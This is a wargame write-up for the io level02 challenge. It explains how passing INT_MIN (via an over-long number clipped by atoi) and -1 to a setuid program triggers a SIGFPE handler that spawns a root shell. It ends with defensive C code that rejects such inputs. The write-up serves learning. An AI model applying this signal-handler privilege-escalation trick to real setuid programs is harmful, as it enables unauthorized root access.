time to play
level2@io:/levels$ ./level02
source code is available in level02.c
let's read what it says
level2@io:/levels$ cat level02.c
//a little fun brought to you by bla

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>

void catcher(int a)
{
    setresuid(geteuid(),geteuid(),geteuid());
    printf("WIN!\n");
    system("/bin/sh");
    exit(0);
}

int main(int argc, char **argv)
{
    puts("source code is available in level02.c\n");
    if (argc != 3 || !atoi(argv[2])) return 1;
    signal(SIGFPE, catcher);
    return abs(atoi(argv[1])) / atoi(argv[2]);
}
level2@io:/levels$
the first function, catcher, sets the suid and drops us into a shell. nice, this is what we want
the main function takes arguments
prints a string
the if statement says
if there are not 3 arguments, or the 2nd argument is not a number (atoi(argv[2]) returns 0)
return 1
else
set catcher as the handler for the SIGFPE signal
let's search for SIGFPE
http://www.gnu.org/software/libc/manual/html_node/Program-Error-Signals.html
this signal is responsible for arithmetic errors like divide by zero (this is interesting)
then it returns the absolute value of arg 1 divided by arg 2
so let's play again
level2@io:/levels$ ./level02 1233 0
source code is available in level02.c

level2@io:/levels$ echo $?
1
level2@io:/levels$
seems we fell into the if statement because it returns 1
so we need a hint 😀
after digging around I got the hint, guess what 😀
after you read the "full" manual page for SIGFPE, here is the hint inside the notes xD "(Also dividing the most negative integer by -1 may generate SIGFPE.)"
ref: http://linux.die.net/man/2/signal
so let's give it the most negative 😀
level2@io:/levels$ ./level02 -994949494994949494491233 -1
source code is available in level02.c

WIN!
sh-4.2$
w000t
btw I know that is weird because (-994949494994949494491233 / -1) = 9.94949495E23
but this is how POSIX works
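Added example, not the level's own code: the same abs()/division as level02, but with the two operand pairs that make the x86 divide trap (divisor 0, and INT_MIN / -1 after abs() wraps) rejected up front, plus a strtol-based parser that refuses the over-long number that atoi() silently clips. It assumes a two's-complement int; parse_int_checked, would_trap and checked_abs_div are names chosen here.

```c
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
/* Reject anything atoi() would silently clip: on the 32-bit box the
 * over-long string above parses as LONG_MIN, which is INT_MIN there. */
bool parse_int_checked(const char *s, int *out)
{
    char *end; errno = 0;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0')            /* empty, or trailing junk */
        return false;
    if (errno == ERANGE || v < INT_MIN || v > INT_MAX)
        return false;                        /* outside int range */
    *out = (int)v;
    return true;
}
/* The two operand pairs that make x86 idiv raise SIGFPE in level02:
 * divisor 0, and INT_MIN / -1 (abs(INT_MIN) wraps back to INT_MIN in
 * two's complement, so the division still overflows after abs()). */
bool would_trap(int a, int b)
{
    return b == 0 || (a == INT_MIN && b == -1);
}
/* Same computation as level02's return statement, guarded. */
bool checked_abs_div(int a, int b, int *out)
{
    if (would_trap(a, b))
        return false;
    *out = abs(a) / b;   /* safe: a != INT_MIN and b != 0 here */
    return true;
}
int main(void)
{
    /* constructed inputs: the pair from the writeup, then a benign pair */
    const char *args[][2] = { { "-994949494994949494491233", "-1" }, { "-1233", "2" } };
    for (int i = 0; i < 2; i++) {
        int a, b, q;
        if (!parse_int_checked(args[i][0], &a) || !parse_int_checked(args[i][1], &b))
            printf("%s %s: rejected, out of int range\n", args[i][0], args[i][1]);
        else if (!checked_abs_div(a, b, &q))
            printf("%s %s: rejected, would raise SIGFPE\n", args[i][0], args[i][1]);
        else
            printf("%s %s: %d\n", args[i][0], args[i][1], q);
    }
}
```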